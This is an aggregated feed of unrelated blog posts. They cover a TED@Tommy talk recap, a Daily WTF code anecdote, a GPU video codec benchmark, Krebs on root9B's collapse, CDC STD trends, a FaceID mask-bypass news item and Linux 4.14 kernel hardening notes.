Let fashion express your individuality. The stylish clothes you’re wearing right now were predicted to be popular up to two years before you ever bought them. This is thanks to trend forecasting agencies, which sell predictions of the “next big thing” to designers.  And according to Tommy Hilfiger retail buyer Mahir Can Isik, trend forecasting is, for lack of a better term, “absolutely bull.” Here’s a fun fact: More than 12,000 fashion brands all get their predictions from the same single agency — and this, Isik suggests, is the beginning of the end of true individuality. “Fashion is an art form — it’s about excitement, human interaction, touching our hearts and desires,” he says. “It’s about self-expression, a physical embodiment of what we portray ourselves as.” He calls on us to break this hold of forecasters and cherish self-expression and individuality.

Stylish clothing for the differently abled fashionista. Mindy Scheier believes that what you wear matters. “The clothes you choose can affect your mood, your health and your confidence,” she says. But when Scheier’s son Oliver was born with muscular dystrophy, a degenerative disorder that makes it hard for him to dress himself or wear clothing with buttons or zippers, she and her husband resorted to dressing him in what was easiest: sweatpants and a T-shirt. One afternoon when Oliver was eight, he came home from school and declared that he wanted to wear blue jeans like everyone else. Determined to help her son, Mindy spent the entire night MacGyvering a pair of jeans, opening up the legs to give them enough room to accommodate his braces and replacing the zipper and button with a rubber band. Oliver went to school beaming in his jeans the next day — and with that first foray into adaptive clothing, Scheier founded Runway of Dreams to educate the fashion industry about the needs of differently abled people. She explains how she designs for people who have a hard time getting dressed, and how she partnered with Tommy Hilfiger to make fashion history by producing the first mainstream adaptive clothing line, Tommy Adaptive.

Environmentally friendly, evolving fashion. The clothing industry is the world’s second largest source of pollution, second only to the oil and gas industry. (The equivalent of 200 T-shirts per person are thrown away annually in the US alone). Which is why sustainability sower Amit Kalra thinks a lot about how to be conscientious about the environment and still stay stylish. For his own wardrobe, he hits the thrift stores and stitches up his own clothing from recycled garments; as he says, “real style lives at the intersection of design and individuality.” As consumer goods companies struggle to provide consumers with the individuality they crave, Kalra suggests one way forward: Start using natural dyes (from sources such as turmeric or lichen) to color clothes sustainably. As the color fades, the clothing grows more personalized and individual to the owner. “There is no fix-all,” Kalra says, “But the fashion industry is the perfect industry to experiment and embrace change that could one day get us to the sustainable future we so desperately need.”

Tito Deler performs Big Joe Turner’s blues classic “Story to Tell” at TED@Tommy. (Photo: Richard Hadley / TED)

With a welcome musical interlude, blues musician (and VP of graphic design for Tommy Hilfiger) Tito Deler takes the stage, singing and strumming a stirring rendition of Big Joe Turner’s blues classic “Story to Tell.”

The truth we can find through literary fiction. Day by day, we’re exposed to streams of news, updates and information. Our brains are busier than ever as we try to understand the world we live in and develop our own story, and we often reach for nonfiction books to learn to become a better leader or inventor, how to increase our focus, and how to maintain a four-hour workweek. But for Tomas Elemans, brand protection manager for PVH, there’s an important reward from reading fiction that we’re leaving behind: empathy. “Empathy is the friendly enemy to our feeling of self-importance. Storytelling can help us to not only understand but feel the complexity, emotions and situations of distant others. It can be a vital antidote to the stress of all the noise around us,” Elemans says. Telling his personal story of the ups and downs of reading Dave Eggers’ Heroes of the Frontier, Elemans explains the importance of narrative immersion — how we transcend the here-and-now when we imagine being the characters in the stories we read — and how it reduces externally focused attention and increases reflection. “Literature has a way of reminding us that the stranger is not so strange,” Elemans says. “The ambition with which we turn to nonfiction books, we can also foster toward literature … Fiction can help us to disconnect from ourselves and tap into an emotional, empathetic side that we don’t often take the time to explore.”

Irene Mora shares the valuable lessons she learned being raised by a mom who was also a CEO. (Photo: Richard Hadley / TED)

Why you shouldn’t fear having a family and a career. As the child of parents who followed their passions and led successful careers, Irene Mora appreciates rather than resents their decision to have a family. Society’s perceptions of what it means to be a good parent — which usually means rejecting the dedicated pursuit of a profession — are dull and outdated, says Mora, now a merchandiser for Calvin Klein. “A lot of these conversations focus on the hypothetical negative effects, rather than the hypothetical positive effects that this could have on children,” Mora explains. “I’m living proof of the positive.” As she and her sister traveled the world with their parents due to her mother’s job as a CEO, she learned valuable lessons: adaptability, authenticity and independence. And despite her mother’s absences and limited face-to-face time, Mora didn’t feel abandoned or lacking in any way. “If your children know that you care, they will feel your love,” she says. “You don’t always have to be together to love and be loved.”

What you can learn from bad advice. Nicole Wilson, Tommy Hilfiger’s director of corporate responsibility, knows bad advice. From a young age, her father — a professional football player notorious for causing kitchen fires — would offer her unhelpful tidbits like: “It’s better to cheat than repeat,” or, at a street intersection, “No cop-y, no stop-y.” As a child, Wilson learned to steer clear of her father’s, ahem, wisdom, but as an adult, she realized that there’s an upside to bad advice. In this fun, personal talk, she shares how bad advice can be as helpful and as valuable as “so-called good advice” — because it can help you recognize extreme courses of action and develop a sense of when you should take the opposite advice from what you’re being offered. Above all, Wilson says, bad advice teaches you that “you have to learn to trust yourself — to take your own advice — because more times than not, your own advice is the best advice you are ever going to get.”

Fashion is a needed avenue of protest, says Kaustav Dey. He spoke about how we can embrace our most authentic selves at TED@Tommy. (Photo: Richard Hadley / TED)

Fashion as a  language of dissent. From a young age, fashion revolutionary and head of marketing for Tommy Hilfiger India Kaustav Dey knew that he was different, that his sense of self diverged from and even contradicted that of the majority of his classmates. He was never going to be the manly man his father hoped for and whom society privileged, he says. But it was precisely this distinct take on himself that would later land him in the streets of Milan and Paris, fashion worlds that further opened his eyes to the protest value of aesthetics. Dey explains the idea that fashion is a needed avenue of protest (but also a dangerous route to take) by speaking of the hateful comments Malala received for wearing jeans, by commenting on the repressive nature of widowed Indian women being eternally bound to white garments, and by telling the stories of the death of transgender activist Alesha and the murder of the eclectic actor Karar Nushi. Instead of focusing on society’s response to these individuals, Dey emphasizes that “fashion can give us a language of dissent.” Dey encourages us all to embrace our most authentic selves, so “in a world that’s becoming whitewashed, we will become the pinpricks of color pushing through.”

Returning to the stage to open Session 2, Tito Deler plays an original blues song, “My Fine Reward,” combining the influence of the sound of his New York upbringing with the style of pre-war Mississippi Delta blues. “I’m moving on to a place now where the streets are paved with gold,” Deler sings, “I’m gonna catch that fast express train to my reward in the sky.”

We should all make it a point not to buy fake goods and to notify officials when we see them being sold, says Alastair Gray, speaking at TED@Tommy in Amsterdam. (Photo: Richard Hadley / TED)

The deadly impact of counterfeit goods. To most consumers, the trade in knock-off goods seems harmless enough — we get to save money by buying lookalike products, and if anyone suffers, it’s only the big companies. But counterfeit investigator Alastair Gray says that those fake handbags, CDs and watches might be supporting organized crime or even terrorist organizations. “You wouldn’t buy a live scorpion because there’s a chance it will sting you on the way home,” Gray says. “But would you still buy a fake handbag if you knew the profit would enable someone to buy the bullets that might kill you and other innocent people?” This isn’t just conjecture: Saïd and Chérif Kouachi, the two brothers behind the 2015 attack on the Charlie Hebdo office in Paris that killed 12 people and wounded 11, purchased their weapons using the proceeds made from selling counterfeit sneakers. When it comes to organized crime and terrorism, most of us feel understandably helpless. But we do have the power to act, Gray says: make it a point not to buy fake goods and to notify officials (online or in real life) when we see them being sold.

Is data a designer’s hero? Data advocate Steve Brown began working in the fashion industry 15 years ago — when he would have to painstakingly sit for 12 hours each day picking every color that matched every fabric per garment he was working on. Today, however, designers can work with visualized 3D garments, fully functional with fabric, trim and prints, and they can even upload fabric choices to view the flow and drape of the design, all before a garment is ever made. Data and technology saves the designer time, Brown says, which allows for more time and attention to go into the creative tasks rather than the mundane ones. The designer’s role with data and technology is that of both a creator and a curator. He points to Amazon’s “Body Labs” and algorithms that learn a user’s personal style, both of which help companies to design custom-made garments. In this way, data can empower both the consumer and designer — and it should be embraced.

A better way to approach data. Every day, we’re inundated with far more data than our brains can process. Data translator Jonathan Koch outlines a few simple tools we can all use to understand and even critique data meant to persuade us. First: we need transparent definitions. Koch, a senior director of strategy and business development at PVH Asia Pacific, uses the example of a famous cereal brand that promised two scoops of raisins in every box of cereal (without bothering to define exactly what a “scoop” is) and a company that says that they’re the “fastest growing startup in Silicon Valley” (without providing a time period for context). The next tool: context and doubt. To get a clearer picture, we need to always question the context around data, and we need to always doubt the source, Koch says. Finally, we need to solve the problem of averages. When we deconstruct averages, which is how most data is delivered to us, into small segments, we can better understand what makes up the larger whole — and quickly get new, nuanced insights. With these three simple tools, we can use data to help us make better decisions about our health, wealth and happiness.

Conscious quitter Daniela Zamudio explains the benefits of moving on at TED@Tommy in Amsterdam. (Photo: Richard Hadley / TED)

An introduction to conscious quitting. “I’m a quitter,” says Daniela Zamudio, “and I’m very good at it.” Like many millennials, Zamudio has quit multiple jobs, cities, schools and relationships, but she doesn’t think quitting marks her as weak or lazy or commitment-phobic. Instead, she argues that leaving one path to follow another is a sign of strength and often leads to greater happiness in the long run. Now a senior marketing and communications manager for Tommy Hilfiger, Zamudio gives us an introduction to what she calls “conscious quitting.” She teaches us to weigh the pros and cons of qutting a particular situation and then instructs us to create a strategy to deal with the repercussions of our choice. For instance, after Zamudio broke off her engagement to a man she had been dating for nine years, she managed her heartbreak by scheduling every minute of her day, seven days a week. “It takes courage to quit,” says Zamudio, “but too often it feels also like it’s wrong.” She concludes her talk by reminding us that listening to our own needs and feelings (and ignoring society’s expectations) can often be just what we need.

Lessons in dissent. Have you ever presented an idea and been immediately barraged with a line of questioning that feels like it’s poking more holes than it is actually questioning? Then you’ve probably engaged with a dissenter. Serial dissenter Andrew Millar promises these disagreements don’t come from a place of malice but rather from compassion with an aim to improve on your idea. “At this point in time, we don’t have enough dissenters in positions of power,” says Millar. “And history shows that having yes-men is rarely a driver of progress.” He suggests that dissenters find a workplace that truly works with them, not against — so if a company heralds conformity or relies heavily on hierarchy, then that place may not be the best for you. But even in the most welcome environment, no dissenter gets off scot-free — each needs to understand that compromise, or dissent upon response, and thinking you’re always right because you’re the only one to speak up are things that need to be mitigated to be successful. And to those in the path of a dissenter, says Millar, know this: when a dissenter speaks up, it can come across as criticism, but please do assume it stems from a place of good intent and connection.

Gabriela Roa speaks about learning to live in, and embrace, chaos, at TED@Tommy in Amsterdam. (Richard Hadley / TED)

Embrace the chaos. As the daughter of an obsessively organized mother, Gabriela Roa grew up believing that happiness was a color-coordinated closet. When she became a mom, she says, “I wanted my son to feel safe and loved in the way I did.” But he, like most toddlers, became “a chaos machine,” leaving toys and clothes in his wake. Roa, an IT project manager at PVH, felt terrible. Not only was she falling short as a disciplinarian, but she was so busy dwelling on her lapses that she wasn’t emotionally present for her son. One day, she remembered this piece of advice: “Whenever you experience a hard moment, there is always something to smile about.” In search of a smile, she began taking photos of her son’s messes. She shared them with friends and was moved by the compassion she received, so she started taking more pictures of her “happy explorer,” in which she documented her son’s creations and tried seeing life from his perspective. She realized that unlike her, he was living in the now — calm, curious and ready to investigate. The project changed her, ultimately bringing her back to playing the cello, an instrument she’d once loved. “I’m not saying that chaos is better than order,” says Roa. “But it is part of life.”

Present fathers: strong children. Dwight Stitt is a market manager for Tommy Hilfiger, but he identifies first and foremost as a father. He speaks passionately about the need for men to be involved in their children’s lives. Reminiscing about his own relationship with his father — and how it took 24 years for them to form a working bond — Stitt shares that so long as life permits, it’s never too late to recover what may seem lost. He has incorporated the lessons he learned from his father and amplified them to reach not only his children but also other people through a camp and canoeing trip. Conceiving of camp as an opportunity to foster love and growth between fathers and children, Stitt says that “camp has taught me that fatherhood is not only vital to a child’s development, but that seemingly huge hurdles can be overcome by simple acts of love and memorable moments.” He goes so far as to explain the emotional, academic and behavioral benefits of working father-child relationships and, in between tears, calls on all fathers to share his goal of reducing the alarming statistics of fatherlessness in whatever form it comes.

How magic tricks (and politicians) fool your brain. Ever wonder how a magic trick works? How did the magician pull a silver coin from behind your ear? How did they know which card was yours? According to magician and New York Times crossword puzzle constructor David Kwong, it all boils down to evolution. Because we take in an infinite number of stimuli at any given time, we only process a tiny fraction of what’s in front of us. Magic works, Kwong says, by exploiting the gaps in our awareness. We never notice the magician flipping our card to the top of the deck because we’re too busy watching him rub his sleeve three times. But the principles of illusion extend beyond a bit of sleight-of-hand, he says. Politicians also exploit us with cognitive misdirection. For instance, policymakers describe an inheritance tax (which only taxes the very wealthy) as a “death tax” to make the public think it applies to everyone. Kwong then demonstrates a few fun tricks to teach us how to see through the illusions and deceptions that surround us in everyday life. He finishes his set with some sage words of advice for everyone (magic lovers or not): “Question what seems obvious, and above all, pay attention to your attention.”


CryptogramMotherboard Digital Security Guide

This digital security guide by Motherboard is very good. I put alongside EFF's "Surveillance Self-Defense" and John Scott-Railton's "Digital Security Low Hanging Fruit." There's also "Digital Security and Privacy for Human Rights Defenders."

There are too many of these....

Worse Than FailureCodeSOD: Delebation

When faced with an API or programming paradigm that requires repetitive, boilerplate code, a developer is left with two options. They may refine or adapt the API/paradigm, using the idioms of their language to make something tedious and verbose into something elegant and clear.

Or they just automate it. If you have a mile of boilerplate that’s mostly the same across the application, just generate that. It’s like copy/paste, but, y’know… automatic.

Which is why Derf Skren found this pile in their codebase:

  public abstract class ExchangeSingleData : IExchangeData
  {
    private readonly string mName;
    private readonly int mLength;

    private Dictionary<string, string> mMapValidData;
    private byte[] mBuffer;

    void AddValidValue(string name, string value) {
        mMapValidData[name] = value;
    }
    //...
    //...
  }

  public class NetChangeSign : ExchangeSingleData
  {
        public const string Plus = "+";
        public const string Minus = "-";

    public NetChangeSign()
      : base("NetChangeSign", 1)
    {
            AddValidValue("Plus", Plus);
            AddValidValue("Minus", Minus);
          }
  }

  public class BidPriceSign : ExchangeSingleData
  {
        public const string Plus = "+";
        public const string Minus = "-";

    public BidPriceSign()
      : base("BidPriceSign", 1)
    {
            AddValidValue("Plus", Plus);
            AddValidValue("Minus", Minus);
          }
  }

  public class AskPriceSign : ExchangeSingleData
  {
        public const string Plus = "+";
        public const string Minus = "-";

    public AskPriceSign()
      : base("AskPriceSign", 1)
    {
            AddValidValue("Plus", Plus);
            AddValidValue("Minus", Minus);
          }
  }

  // ... and 7 more versions of the same class

The goal of this code is so that they can prepend a “+” or a “-” to a transaction’s value. Note the mBuffer in the base class- they don’t use strings (or, y’know… numbers) to represent the transaction value, but a byte array instead. The “value” is that it lets them write a line like this:

lMessage.NetChangeSign.SetValue(GeneratePriceSign(lPrice));

Which allows the instance stored in NetChangeSign to flip that +/- based on the return value of GeneratePriceSign. Obviously, this lets the NetChangeSign instance have full control of the logic of how the sign gets set, right? I mean, each instance has its own map that contains all the allowed values, right? Well… sure, but how do they decide? Based on GeneratePriceSign… which looks like this:

  private static string GeneratePriceSign(Side aSide)
  {
    if (aSide.Equals(Side.Buy))
      return "+";
    else
      return "-";
  }

In design patterns terms, we call this “delebation”. It’s like delegation, but only the person doing it to themselves enjoys it.

[Advertisement] Manage IT infrastructure as code across all environments with Puppet. Puppet Enterprise now offers more control and insight, with role-based access control, activity logging and all-new Puppet Apps. Start your free trial today!

Planet DebianColin Watson: Kitten Block equivalent for Firefox 57

I’ve been using Kitten Block for years, since I don’t really need the blood pressure spike caused by accidentally following links to certain UK newspapers. Unfortunately it hasn’t been ported to Firefox 57. I tried emailing the author a couple of months ago, but my email bounced.

However, if your primary goal is just to block the websites in question rather than seeing kitten pictures as such (let’s face it, the internet is not short of alternative sources of kitten pictures), then it’s easy to do with uBlock Origin. After installing the extension if necessary, go to Tools → Add-ons → Extensions → uBlock Origin → Preferences → My filters, and add www.dailymail.co.uk and www.express.co.uk, each on its own line. (Of course you can easily add more if you like.) Voilà: instant tranquility.

Incidentally, this also works fine on Android. The fact that it was easy to install a good ad blocker without having to mess about with a rooted device or strange proxy settings was the main reason I switched to Firefox on my phone.

,

Planet DebianSteinar H. Gunderson: Introducing Narabu, part 6: Performance

Narabu is a new intraframe video codec. You probably want to read part 1, part 2, part 3, part 4 and part 5 first.

Like I wrote in part 5, there basically isn't a big splashy ending where everything is resolved here; you're basically getting some graphs with some open questions and some interesting observations.

First of all, though, I'll need to make a correction: In the last part, I wrote that encoding takes 1.2 ms for 720p luma-only on my GTX 950, which isn't correct—I remembered the wrong number. The right number is 2.3 ms, which I guess explains even more why I don't think it's acceptable at the current stage. (I'm also pretty sure it's possible to rearchitect the encoder so that it's much better, but I am moving on to other video-related things for the time being.)

I encoded a picture straight off my DSLR (luma-only) at various resolutions, keeping the aspect. Then I decoded it a bunch of times on my GTX 950 (low-end last-generation NVIDIA) and on my HD 4400 (ultraportable Haswell laptop) and measured the times. They're normalized for megapixels per second decoded; remember that doubling width (x axis) means quadruple the pixels. Here it is:

Narabu decoding performance graph

I'm not going to comment much beyond two observations:

  • Caches matter, even on GPU. This is the same data over and over again (so small images get an unrealistic boost), so up to a certain point, it's basically all in L1.
  • The GTX 950 doesn't really run away from the Intel card before it's getting enough data to chew on. Bigger GPUs don't have faster cores—they're just more parallel.

Encoding only contains the GTX 950 because I didn't finish the work to get that single int64 divide off:

Narabu encoding performance graph

This is… interesting. I have few explanations. Probably more benchmarking and profiling would be needed to make sense of any of it. In fact, it's so strange that I would suspect a bug, but it does indeed seem to create a valid bitstream that is decoded by the decoder.

Do note, however, that seemingly even on the smallest resolutions, there's a 1.7 ms base cost (you can't see it on the picture, but you'd see it in an unnormalized graph). I don't have a very good explanation for this either (even though there are some costs that are dependent on the alphabet size instead of the number of pixels), but figuring it out would probably be a great start for getting the performance up.

So that concludes the series, on a cliffhanger. :-) Even though it's not in a situation where you can just take it and put it into something useful, I hope it was an interesting introduction to the GPU! And in the meantime, I've released version 1.6.3 of Nageru, my live video mixer (also heavily GPU-based) with various small adjustments and bug fixes found before and during Trøndisk. And Movit is getting compute shaders for that extra speed boost, although parts of it is bending my head. Exciting times in GPU land :-)

Planet DebianDaniel Pocock: Linking hackerspaces with OpenDHT and Ring

Francois and Nemen at the FIXME hackerspace (Lausanne) weekly meeting are experimenting with the Ring peer-to-peer softphone:

Francois is using Raspberry Pi and PiCam to develop a telepresence network for hackerspaces (the big screens in the middle of the photo).

The original version of the telepresence solution is using WebRTC. Ring's OpenDHT potentially offers more privacy and resilience.

TEDOpen now: Audition for TED2018!

Olalekan Jeyifous speaks at TED Talent Search 2017 - Ideas Search, January 26, 2017, New York, NY. Photo: Anyssa Samari / TED

At last year’s TEDNYC Idea Search, artist Olalekan Jeyifous showed off his hyper-detailed and gloriously complex imaginary cities. See more of his work in this TED Gallery. Photo: Anyssa Samari / TED

Do you have an idea idea worth spreading? Do you want to speak on the TED2018 stage in Vancouver in April?

To find more new voices, TED is hosting an Idea Search at our office theater in New York City on January 24, 2018. Speakers who audition at this event might be chosen for the TED2018 stage or to become part of our digital archive on TED.com.

You’re invited to pitch your amazing idea to try out on the Idea Search stage in January. The theme of TED2018 is The Age of Amazement, so we are looking for ideas that connect to that theme — from all angles. Are you working on cutting-edge technology that the world needs to hear about? Are you making waves with your art or research? Are you a scientist with a new discovery or an inventor with a new vision? A performer with something spectacular to share? An incredible storyteller? Please apply to audition at our Idea Search.

Important dates:

The deadline to apply to the Idea Search is Tuesday, December 5, 2017, at noon Eastern.

The Idea Search event happens in New York City from the morning of January 23 through the morning of January 25, 2018. Rehearsals will take place on January 23, and the event happens in the evening of January 24.

TED2018 happens April 10–14, 2018, in Vancouver.

Don’t live in the New York City area? Don’t let that stop you from applying — we may be able to help get you here.

Here’s how to apply!

Sit down and think about what kind of talk you’d like to give, then script a one-minute preview of the talk.

Film yourself delivering the one-minute preview (here are some insider tips for making a great audition video).

Upload the film to Vimeo or YouTube, titled: “[Your name] TED2018 audition video: [name of your talk]” — so, for example: “Jane Smith TED2018 audition video: Why you should pay attention to roadside wildflowers

Then complete the entry form, paste your URL in, and hit Submit!

Curious to learn more?

Read about a few past Idea Search events: TEDNYC auditions in 2017, in 2014 and in 2013.

Watch talks from past Idea Search events that went viral on our digital archive on TED.com:

Christopher Emdin: Teach teachers how to create magic (more than 2 million views)
Sally Kohn: Let’s try emotional correctness (more than 2 million views)
Lux Narayan: What I learned from 2,000 obituaries (currently at 1.4 million views!)
Lara Setrakian: 3 ways to fix a broken news industry (just shy of a million views)
Todd Scott: An intergalactic guide to using a defibrillator (also juuust south of a million)

And here are just a few speakers who were discovered during past talent searches:

Ashton Applewhite: Let’s end ageism (1m views)
OluTimehin Adegbeye: Who belongs in a city? (a huge hit at TEDGlobal 2017)
Richard Turere: My invention that made peace with the lions (2m views)
Zak Ebrahim: I am the son of a terrorist. Here’s how I chose peace (4.7m views and a TED Book)


Krebs on SecurityR.I.P. root9B? We Hardly Knew Ya!

root9B Holdings, a company that many in the security industry consider little more than a big-name startup aimed at cashing in on the stock market’s insatiable appetite for cybersecurity firms, surprised no one this week when it announced it was ceasing operations at the end of the year.

Founded in 2011 as root9B Technologies, the company touted itself as an IT security training firm staffed by an impressive list of ex-military leaders with many years of cybersecurity experience at the Department of Defense and National Security Agency (NSA). As it began to attract more attention from investors, root9B’s focus shifted to helping organizations hunt for cyber intruders within their networks.

By 2015, root9B was announcing lucrative cybersecurity contracts with government agencies and the infusion of millions from investors. The company’s stock was ballooning in price, reaching an all-time high in mid-May 2015.

That was just days after root9B issued a headline-grabbing report about how its cyber intelligence had single-handedly derailed a planned Russian cyber attack on several U.S. financial institutions.

The report, released May 12, 2015, claimed root9B had uncovered plans by an infamous Russian hacking group to target several banks. The company said the thwarted operation was orchestrated by Fancy Bear/Sofacy, a so-called “advanced persistent threat” (APT) hacking group known for launching sophisticated phishing attacks aimed at infiltrating some of the world’s biggest corporations.  root9B released its Q1 2015 earnings two days later, reporting record revenues.

On May 20, 2015, KrebsOnSecurity published a rather visceral dissection of that root9B report: Security Firm Redefines APT; African Phishing Threat. The story highlighted the thinness of the report’s claims, pointing to multiple contradictory findings by other security firms which suggested the company had merely detected several new phishing domains being erected by a comparatively low-skilled African phishing gang that was well-known to investigators and U.S. banks.

In mid-June 2015, an anonymous researcher who’d apparently done a rather detailed investigation into root9B’s finances said the company was “a worthless reverse-merger created by insiders with [a] long history of penny-stock wipeouts, fraud allegations, and disaster.”

That report, published by the crowd-sourced financial market research site SeekingAlpha.com, sought to debunk claims by root9B that it possessed “proprietary” cybersecurity hardware and software, noting that the company mainly acts as a reseller of a training module produced by a third party.

root9B’s stock price never recovered from those reports, and began a slow but steady decline after mid-2015. In Dec. 2016, root9B Technologies announced a reverse split of its issued and outstanding common stock, saying it would be moving to the NASDAQ market with the trading symbol RTNB and a new name — root9B Holdings. On January 18, 2017, a reshuffled root9B rang the market opening bell at NASDAQ, and got a bounce when it said it’d been awarded a five-year training contract to support the U.S. Defense Department.

The company’s founders remained upbeat even into mid-2017. On June 6, 2017 it announced that Michael Hayden, the four-star general who until recently served as director of the U.S. National Security Agency, had joined the company’s board.

On June 23, 2017, root9B issued a press release reminding everyone that the company had remained #1 on the Cybersecurity 500 for the 6th consecutive quarter. The Cybersecurity 500, by the way, rates cybersecurity firms based on their “branding and marketing.”

Nobody ever accused root9B of bad marketing. But all the press releases in the world couldn’t hide the fact that the company had never turned a profit. It lost more than $18.3 million in 2016, more than doubling a $8.03 million loss in 2015.

Since August 2017, shares of the company’s stock have fallen more than 90 percent. On Sept. 28, 2017, all of root9B Holdings’ assets were acquired by venture investment firm Tracker Capital Management LLC, and then sold at auction.

On Nov. 13, root9B Holdings issued a press release saying NASDAQ was de-listing the firm on Nov. 15 and that it was ceasing operations at the end of this year.

“With the absence of any operating assets remaining after the Foreclosure, the Company will cease any and all operations effective, December 31, 2017,” the (final?) root9B press release concludes.

Several followers on Twitter say it’s too soon to sound the death knell for root9B as a whole, pointing out that while root9B Holdings may have been gutted and sold, for now it appears the security company root9B LLC is intact and is merely going back to being a private concern.

In any case, the demise of root9B Holdings resonates loudly with that of Norse Corp., another flashy, imploded cybersecurity startup that banked heavily on attracting and touting top talent, while managing to produce very little that was useful to or actionable by anybody.

Companies like these are a reminder that your success or failure in business as in life is directly tied to what you produce — not what you promise or represent. There is no shortcut to knowledge, success or mastery, and this goes for infosec students as well as active practitioners of the craft. Focus on consistently producing quality, unique content and/or services that are of real value to others, and the rest will take care of itself.

Update, 10:30 a.m.: Added perspective from Twitter readers.

Sociological ImagesWhat’s Trending? A Rise in STDs

The CDC recently issued a press release announcing that rates of reported cases for sexually transmitted diseases are setting record highs. The new report offers reports of rates going back to 1941 in a table, so I made a quick chart to see the pattern in context and compare the more common conditions over time (HIV wasn’t included in this particular report).

It is important to note that a big part of changes in disease rates is usually detection. Once you start looking for a condition, you’ll probably find more of it until enough diagnoses happen for treatment to bring the rates down. Up until 2000, the U.S. did pretty well in terms of declining rates for cases of gonorrhea and syphilis. Zoom in on the shaded area from 2000 to 2016, however, and you can see a pretty different story. These rates are up over the last 16 years, and chlamydia rates have been steadily increasing since the start of reporting in 1984.

STDs are fundamentally a social phenomenon, especially because they can spread through social networks. However, we have to be very careful not to jump to conclusions about the causes of these trends. It’s tempting to blame dating apps or hookup culture, for example, but early work at the state level only finds a mixed relationship between dating app use and STD rates and young people also have higher rates of sexual inactivity. Rate increases could even be due in part to detection now that more people have access to health coverage and care through the Affordable Care Act. Just don’t wait for peer review to finish before going to get tested!

Inspired by demographic facts you should know cold, “What’s Trending?” is a post series at Sociological Images featuring quick looks at what’s up, what’s down, and what sociologists have to say about it.

Evan Stewart is a Ph.D. candidate in sociology at the University of Minnesota. You can follow him on Twitter.

(View original at https://thesocietypages.org/socimages)

CryptogramApple FaceID Hacked

It only took a week:

On Friday, Vietnamese security firm Bkav released a blog post and video showing that -- by all appearances -- they'd cracked FaceID with a composite mask of 3-D-printed plastic, silicone, makeup, and simple paper cutouts, which in combination tricked an iPhone X into unlocking.

The article points out that the hack hasn't been independently confirmed, but I have no doubt it's true.

I don't think this is cause for alarm, though. Authentication will always be a trade-off between security and convenience. FaceID is another biometric option, and a good one. I wouldn't be less likely to use it because of this.

FAQ from the researchers.

Worse Than FailureThe For While Loop

Alex R. was the architect of a brand spanking new system that was to read inputs from numerous other internal systems, crunch a whole bunch of numbers, record everything in a database and spew forth a massive report file. He spent months designing the major details of the system, and more months designing the various sub-components. From all this came a variety of business-level data structures which spawned POJOs and the underlying DB tables to store assorted inputs, flags and outputs. He did a fairly thorough job of documenting all the interfaces, and provided detailed specifications for all of the next-level methods that were left as TBDs in the design.

Java Programming Cover

The project manager then assigned units of work to numerous offshored junior developers who managed to get virtually everything wrong. If they couldn't understand what a spec required, they changed the spec to reflect what they actually wrote. This caused Alex to start versioning the requirements document in order to catch the changes by the junior developers so that they could be rolled back.

After a while, the number of junior-developer-caused issues was piling up and Alex suggested some training sessions on certain ways of doing things to reduce the chaff he had to deal with. Management turned him down because they couldn't afford to take developers off of coding tasks for purposes of training; there was a schedule to keep! The fact that oodles of time were being wasted on them building the wrong stuff only to have to have why it was wrong explained and then have them go back and re-do it - sometimes 6 or 7 times - was irrelevant.

So how does one deal with idiotic management like this?

Alex thought that he had found a way to expose the problem and (hopefully) force something to be done. He would put in something (that any experienced developer should be able to spot as a simple code formatting issue) that the junior developers would never spot. The code would work correctly, but it would stymie them so that they had to first understand it before they could change it. He used the following coding style in a variety of locations throughout the codebase and waited:

  List<Widget> widgets;
  for (int i=0; i<limit; i++) {
      // Do stuff
  } while ((widgets = getWidgets()) == null);

For those not familiar with Java, the closing brace of a for-loop is followed by an implicit semicolon, so the while (expression); statement is unrelated to the for-loop. However, the junior developers didn't know this, and couldn't find any documentation on a for-while statement. Although they were able to create little test programs, they didn't understand how the while-expression controlled the for-loop (it doesn't). In this case, the underlying DAO either returned a populated list or threw an exception, so it was effectively while-false (the function call and assignment occurred once) and was just syntactic nonsense that confused the junior developers.

They couldn't recognize a Java 101 code format issue and they were sufficiently stubborn that they refused to simply ask Alex what the code was doing. They were even foolish enough to openly discuss it amongst themselves on a conference line - agreeing not to ask for help until they figured it out - before a meeting with Alex and his boss began.

After 6 weeks of them floundering around on it, the offshore manager finally brought the issue up with Alex and his boss, at which time Alex explained what running the code formatter would show. He then pointed out that since they didn't know the basics of reading Java code and preferred to waste massive amounts of time rather than just asking about something they didn't understand, it was clear that they didn't have the wherewithall to make technical decisions on a larger scale, or change the design documents as they saw fit.

He continued to point out that until the junior developers showed marked improvements in their understanding of simple code, they should concentrate on learning to do basic programming instead of trying to be architects. To this end, he again offered to have ongoing training sessions where he would attempt to raise their skill level.

Of course management backed the cheap offshore labor. It was at this point that Alex realized it was a lost cause, so he fixed all the for-while snippets and updated the latest version of the detailed design document with a new opening paragraph:

  To Whomever Inherits This System:

  Detailed design documents were created by experienced people. Management decreed
  that junior developers could ignore them, at will and without penalty. The state
  of the code reflects this.
  
  Fair Warning!

Then he committed it, secure in the knowledge that the junior developers would never bother to look at it again once he was gone. Then he gave two weeks notice.

[Advertisement] Release! is a light card game about software and the people who make it. Play with 2-5 people, or up to 10 with two copies - only $9.95 shipped!

Planet DebianKees Cook: security things in Linux v4.14

Previously: v4.13.

Linux kernel v4.14 was released this last Sunday, and there’s a bunch of security things I think are interesting:

vmapped kernel stack on arm64
Similar to the same feature on x86, Mark Rutland and Ard Biesheuvel implemented CONFIG_VMAP_STACK for arm64, which moves the kernel stack to an isolated and guard-paged vmap area. With traditional stacks, there were two major risks when exhausting the stack: overwriting the thread_info structure (which contained the addr_limit field which is checked during copy_to/from_user()), and overwriting neighboring stacks (or other things allocated next to the stack). While arm64 previously moved its thread_info off the stack to deal with the former issue, this vmap change adds the last bit of protection by nature of the vmap guard pages. If the kernel tries to write past the end of the stack, it will hit the guard page and fault. (Testing for this is now possible via LKDTM’s STACK_GUARD_PAGE_LEADING/TRAILING tests.)

One aspect of the guard page protection that will need further attention (on all architectures) is that if the stack grew because of a giant Variable Length Array on the stack (effectively an implicit alloca() call), it might be possible to jump over the guard page entirely (as seen in the userspace Stack Clash attacks). Thankfully the use of VLAs is rare in the kernel. In the future, hopefully we’ll see the addition of PaX/grsecurity’s STACKLEAK plugin which, in addition to its primary purpose of clearing the kernel stack on return to userspace, makes sure stack expansion cannot skip over guard pages. This “stack probing” ability will likely also become directly available from the compiler as well.

set_fs() balance checking
